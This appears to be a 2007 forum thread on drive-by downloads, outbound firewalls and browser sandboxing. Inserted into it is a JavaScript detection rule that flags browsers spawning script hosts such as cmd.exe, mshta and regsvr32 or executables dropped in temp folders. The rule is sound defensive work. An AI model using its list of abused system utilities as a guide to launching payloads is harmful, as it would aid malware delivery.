Although the OP has experienced an infection with Firefox, I nonetheless believe it is more secure than IE because it lacks ActiveX, is not integrated into the operating system, and it is patched more frequently than IE. The point raised above about 3rd-party browser add-ons being a potential source of attacks is well taken. Any such software should be removed if it is not essential.

Doc Serenity
October 16th, 2007, 09:45 AM
-{ Quote: "Well, I have been surfing the net for about 12 years now, going to good and bad places alike, using Firefox, Opera, K-Meleon in recent times, along with IE7 and prior versions, and I have never ever once been hit by a drive-by download, so I must just be lucky....;)" }-

Unfortunately, Kerodo, I have been hit a few times. And I go to mostly the 'good' sites.
I prefer to be able to block unwanted inbound but I also recognize the need for strong outbound protection.

solcroft
October 16th, 2007, 10:00 AM
-{ Quote: "Well, my wife has gotten hit 5 times in 8 years, not common, but too common for me.

Once was using firefox with noscript. She whitelisted quite a few sites, it is simply impractical otherwise, unless you want to hit ok 10 times each time you land on a site. And she has to allow script on some sites. And likely, and unfortunately one site she whitelisted later had a malicious script.

Bottom line she has entirely different use than you, entirely different set of needs, entirely different sites, entirely different risk than you. So unfortunately your way does not work for everyone's needs. Works for me and you, but not for her.

But I guess if you don't see it in your habits, it does not exist." }-
Hi spamyou,

I just want to ask something: assuming the latest version of Firefox was installed, has your wife ever been infected through Firefox when NOT using NoScript?

The reason many people (myself included) are not worried about outbound protection is because we know there is nothing inside our PCs that connects out maliciously, and that knowledge stems from the fact that we have the biggest vector malware can attack from, aka the internet browser, locked down. The easiest way to do this is to simply use a non-IE browser, or a sandboxing program. If you have some time to spend and are interested in learning further, there are programs that can monitor your internet browser for any suspicious activity, such as when it comes under a buffer overflow attack or when it tries to silently execute a new program without asking you.

All in all, driveby downloads are a smaller problem than you'd expect, especially when you learn why and how they can happen - the solutions and countermeasures become very obvious then.
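The post above mentions monitoring the browser for a silent attempt to execute a new program. As an added example (not code from the thread or from any product named in it), here is the detection logic such a monitor would run, applied to a few constructed process-creation events in a JSON-lines form: a browser parent spawning a child that is not one of its expected helpers is flagged, and the severity is raised when the child is a script host or lives in a temp/download directory. The browser, helper and drop-directory lists are assumptions for the demo and would be tuned per environment.

```javascript
'use strict';

// Assumed lists for the demo; tune these to the environment being monitored.
const BROWSERS = new Set(['iexplore.exe', 'firefox.exe', 'opera.exe', 'k-meleon.exe']);
const EXPECTED_CHILDREN = new Set(['iexplore.exe', 'firefox.exe', 'opera.exe', 'k-meleon.exe', 'acrord32.exe']);
const SCRIPT_HOSTS = new Set(['cmd.exe', 'wscript.exe', 'cscript.exe', 'regsvr32.exe', 'rundll32.exe', 'mshta.exe']);
const DROP_DIRS = [/\\temp\\/i, /\\temporary internet files\\/i, /\\downloads\\/i];

function baseName(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Classify one process-creation event; returns null when nothing is suspicious.
function classify(evt) {
  const parent = baseName(evt.parentImage);
  if (!BROWSERS.has(parent)) return null;
  const child = baseName(evt.image);
  if (EXPECTED_CHILDREN.has(child)) return null;

  const reasons = [`browser ${parent} spawned ${child}`];
  let severity = 'medium';
  if (SCRIPT_HOSTS.has(child)) {
    severity = 'high';
    reasons.push('child is a script host or system utility');
  }
  if (DROP_DIRS.some((re) => re.test(evt.image))) {
    severity = 'high';
    reasons.push('child image lives in a temp/download directory');
  }
  return { ts: evt.ts, pid: evt.pid, image: evt.image, severity, reasons };
}

// Run the rule over JSON-lines input; malformed or incomplete lines are skipped, not fatal.
function detectBrowserSpawns(lines) {
  const alerts = [];
  for (const line of lines) {
    let evt;
    try { evt = JSON.parse(line); } catch (e) { continue; }
    if (!evt || !evt.image || !evt.parentImage) continue;
    const alert = classify(evt);
    if (alert) alerts.push(alert);
  }
  return alerts;
}

// Constructed sample events (not a real log): an IE tab, two children of IE that a user never
// asked for, a normal Firefox launch from Explorer, and Firefox opening a PDF reader.
const SAMPLE_LOG = [
  JSON.stringify({ ts: '2007-10-16T10:00:01', pid: 1201, parentImage: 'C:\\Program Files\\Internet Explorer\\iexplore.exe', image: 'C:\\Program Files\\Internet Explorer\\iexplore.exe' }),
  JSON.stringify({ ts: '2007-10-16T10:00:07', pid: 1340, parentImage: 'C:\\Program Files\\Internet Explorer\\iexplore.exe', image: 'C:\\Documents and Settings\\alice\\Local Settings\\Temp\\setup[1].exe' }),
  JSON.stringify({ ts: '2007-10-16T10:00:08', pid: 1344, parentImage: 'C:\\Program Files\\Internet Explorer\\iexplore.exe', image: 'C:\\WINDOWS\\system32\\cmd.exe' }),
  JSON.stringify({ ts: '2007-10-16T10:01:00', pid: 1400, parentImage: 'C:\\WINDOWS\\explorer.exe', image: 'C:\\Program Files\\Mozilla Firefox\\firefox.exe' }),
  JSON.stringify({ ts: '2007-10-16T10:01:05', pid: 1420, parentImage: 'C:\\Program Files\\Mozilla Firefox\\firefox.exe', image: 'C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\AcroRd32.exe' }),
  'this line is not json and is skipped',
];

for (const a of detectBrowserSpawns(SAMPLE_LOG)) {
  console.log(`[${a.severity}] ${a.ts} pid=${a.pid} ${a.image}\n    ${a.reasons.join('; ')}`);
}
```

The two events flagged are the ones a drive-by typically produces: a freshly dropped executable in a temp directory and a command interpreter, both with the browser as parent. The Explorer-launched browser and the PDF helper pass, which is the allowlisting the post's "without asking you" distinction depends on.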

Doc Serenity
October 16th, 2007, 10:08 AM
@ Zombini,
I just looked at the NIS 2008 site.
If I am understanding this correctly Browser Defender only protects IE7. This would leave FF, Opera and others out of luck. And I prefer FF and Opera to IE7.
Am I understanding this correctly?
Thanks.

Kees1958
October 16th, 2007, 10:09 AM
Spamyou,

GeSWall Pro or DefenseWall (as said earlier) might do the trick. I changed from IE7 to Opera on the PC of my wife. You can skin Opera in such a way you won't notice the difference. Another plus of Opera is that it loads way faster than IE or Firefox.

Regards Kees

solcroft
October 16th, 2007, 10:13 AM
-{ Quote: "@ Zombini,
I just looked at the NIS 2008 site.
If I am understanding this correctly Browser Defender only protects IE7. This would leave FF, Opera and others out of luck. And I prefer FF and Opera to IE7.
Am I understanding this correctly?
Thanks." }-
I'd say that's because only IE7 needs this "Browser Defender" protection - an UNPATCHED copy of IE7, that is. Apparently when all patches are applied, IE7 is quite the secure browser, despite popular belief.

Zombini
October 16th, 2007, 10:53 AM
-{ Quote: "@ Zombini,
I just looked at the NIS 2008 site.
If I am understanding this correctly Browser Defender only protects IE7. This would leave FF, Opera and others out of luck. And I prefer FF and Opera to IE7.
Am I understanding this correctly?
Thanks." }-


It only protects IE, both IE6 and IE7. Yes, there is no support for FF and Opera.

spamyou
October 16th, 2007, 11:23 AM
Thanks for all the suggestions.

I had what I thought was the ideal setup for her.
IE7 via LUA (DropMyRights) with Sandboxie for browsing. Sandboxie was set to erase all, no saving, on closure.

She would close IE7 (erasing the sandbox) and use Firefox when visiting financial sites (she prefers IE7 for work and browsing, though will use Firefox for just financial, and it helps her to mentally remember to close IE7).

I think this would have been very safe, but Sandboxie slows browsing slightly (10-15% on average), and on sites with a lot of content can hang for a second, and I get constant complaining.

So I substituted GeSWall, which does not slow browsing at all. The only issue I have is that I use Sandboxie myself, I don't understand GeSWall as well, and I don't believe it deletes all files automatically on closure, and instead tries to specifically trap malware based on behavior.

I actually like DefenseWall's security best, but it too slowed browsing some, and even a little more than Sandboxie.

I tried ForceField, the new beta browser sandbox from ZoneAlarm, but it corrupts links like old GreenBorder did; they are still working on it.

I have not tried Opera, and if it has a skin similar to IE7, I will look into that. Haute Secure I have not heard of, will try that as well. I have an allergy to Symantec products from fixing several friends' computers.

So basically I am still looking for the ideal sandbox (for her) that virtualizes and erases all automatically when closed, and does not slow the browser down at all. But for now I am using GeSWall for her, and who knows, maybe that is just as safe as Sandboxie; I need to read more about it.

solcroft
October 16th, 2007, 11:52 AM
I suggest you try the anti-malware software forum if the discussion is going to veer towards the specifics of sandbox applications, and the like.

AaLF
October 18th, 2007, 06:52 PM
Depends on what the original poster meant by "outbound". If all you want to do is see who is doing all those 'dial-outs', especially when one boots up, there is a simple thingie that 'snitches' & prompts you: "so & so" program is trying to 'dial out'. Do you give permission: YES - NO?

I don't remember the name of this little freebie firewall but the answer was posted up in this forum last year but I can't find it.